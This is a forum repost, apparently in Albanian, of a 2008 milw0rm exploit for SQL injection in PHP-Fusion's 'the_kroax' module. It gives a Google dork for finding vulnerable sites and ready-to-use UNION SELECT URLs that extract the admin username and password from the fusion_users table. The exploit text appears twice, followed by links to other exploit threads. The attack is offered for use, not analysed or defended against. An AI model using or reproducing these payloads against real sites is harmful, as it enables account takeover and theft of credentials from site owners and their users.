The kroax php_fusion Remote SQL-injection.
Faqja 1 e 1
The kroax php_fusion Remote SQL-injection.
--- Remote SQL Injection ---
[+]Google Dork: inurl:"kroax.php?category"
--------------
Exploit
--------------
example:
www.site.com/infusions/the_kroax/kroax.php?category= [SQL]
[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang
[+] password:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\
ps. To find username use first "SQL" with table_name user_name, and for password use second "SQL" with table_name user_password.
========================================================== Greetz to: All my Albanian brothers ==========================================================
# milw0rm.com [2008-06-26]
[+]Google Dork: inurl:"kroax.php?category"
--------------
Exploit
--------------
example:
www.site.com/infusions/the_kroax/kroax.php?category= [SQL]
[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang
[+] password:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\
ps. To find username use first "SQL" with table_name user_name, and for password use second "SQL" with table_name user_password.
========================================================== Greetz to: All my Albanian brothers ==========================================================
# milw0rm.com [2008-06-26]
σт¢нєє™- Super Moderator
- Postimet : 696
Points : 570383
Join date : 26/04/2009
Similar topics
» Hack me PHP injection
» CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
» WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities
» phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability [~] Author : Kacper
» CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
» WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities
» phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability [~] Author : Kacper
Faqja 1 e 1
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi